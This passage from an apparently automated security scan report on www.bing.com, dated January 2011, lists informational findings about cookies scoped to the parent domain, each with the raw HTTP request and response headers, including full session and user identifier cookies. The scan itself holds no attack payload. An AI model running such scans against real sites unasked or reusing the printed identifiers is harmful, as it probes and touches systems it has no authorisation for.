...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Content-Type: text/html; charset=utf-8
Location: /videos/results.aspx
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 17:11:46 GMT
Connection: close
Set-Cookie: _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; expires=Tue, 29-Jan-2013 17:11:46 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1296407506; domain=.bing.com; path=/


16.226. http://www.bing.com/events/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:30 GMT
Connection: close
Set-Cookie: _SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/

Ref A: B2575C613A604708B56E80B00C179519 Ref B: F3576EA2ACED896FAE6E8179524B8516 Ref C: Sat Jan 29 15:53:30 2011
PST

16.227. http://www.bing.com/fd/ls/GLinkPing.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/GLinkPing.aspx?CM=TMF&IG=9874d115203d4525a6dc5f12136077f0&CID=F741A5D3C8544F77A0B57D8439E7E06E HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:14 GMT
Connection: close
Set-Cookie: OrigMUID=; expires=Thu, 01-Feb-2001 17:11:14 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:14 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

16.228. http://www.bing.com/fd/ls/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=9874d115203d4525a6dc5f12136077f0&CID=F741A5D3C8544F77A0B57D8439E7E06E&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:3,%22FC%22:-1,%22BC%22:3,%22BS%22:10,%22H%22:12,%22C1%22:-1,%22C2%22:-1,%22BP%22:1000,%22KP%22:-1,%22CT%22:1019,%22IL%22:1}}&P=video&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; _SS=SID=4318D78D50E640FC90E674B1FECFA468; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621019&D=1593447&AF=NOFORM

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:10 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:10 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

16.229. http://www.bing.com/finance/stockscreener

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /finance/stockscreener

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /finance/stockscreener HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 128153
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 01:52:17 GMT
Connection: close
Set-Cookie: _SS=SID=965375748DDD4D8188E499C867CEF5C8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c03e263debce44bb8933c4855c834e0ea; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

16.230. http://www.bing.com/images/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /images/results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62450
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:13 GMT
Connection: close
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/images
Set-Cookie: _SS=SID=284EF21770EF4BD0AA7FB9D61CA8CF78; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce493bb2b667d42a4bbbffd58ff8085dc; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

16.231. http://www.bing.com/local/ypdefault.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/ypdefault.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 57381
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:53:10 GMT
Last-Modified: Sat, 29 Jan 2011 23:53:10 GMT
X-BM-TraceID: ee663d132ace4420b9eab1478d59e8be
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001605
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:10 GMT
Connection: close
Set-Cookie: BID=234f29943060401f9ea3fd8c0fccd2b9; path=/local
Set-Cookie: CID=d7ba30d0ced2493187723ae5e97a11c0; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=1/29/2011 11:53:10 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _SS=SID=9C78E9D32BAB47298AA4173498A90C8F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce83ec72017dc49e5ac26803c481780a7; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...

16.232. http://www.bing.com/maps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: aa4bb9bcb1bd4ee1b0f7f47adb778554
X-Ve-Server: CPK-01401-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: CPKM001401
Date: Sun, 30 Jan 2011 17:04:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=4FDEC46FE84D47C7A27357A4B60C2F21; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb39404c1e43b486e8819f4088dc7362c; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Content-Length: 117670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

16.233. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 4921bce1e14044759548958ceb90d967
X-Ve-Server: EWR-01612-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001612
Date: Sun, 30 Jan 2011 17:06:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=A542DD3C69694894BF4BE6BD7321BB59; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca4184cfc9d4f4cccad735eb747233d7c; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621026&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Content-Length: 117393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

16.234. http://www.bing.com/maps/explore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43672
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01612
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001612
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:06 GMT
Connection: close
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _SS=SID=A21BB79701BC4D8A8674B6637A0C1148; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5a0f31712a284b0fb357b1ff693d5880; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...

16.235. http://www.bing.com/msnhomepagehistory.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /msnhomepagehistory.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /msnhomepagehistory.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011
PST

16.236. http://www.bing.com/news/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:02:39 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296406958; domain=.bing.com; path=/
Set-Cookie: _SS=SID=555066E581BE46E4AA183A542A326C4A; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:38 GMT; domain=.bing.com; path=/


16.237. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:03:46 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296407026; domain=.bing.com; path=/
Set-Cookie: _SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/


16.238. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search?q=ozzy+osbourne+justin+bieber&form=msnhpm HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61044
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:04:12 GMT
Connection: close
Set-Cookie: _SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

16.239. http://www.bing.com/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
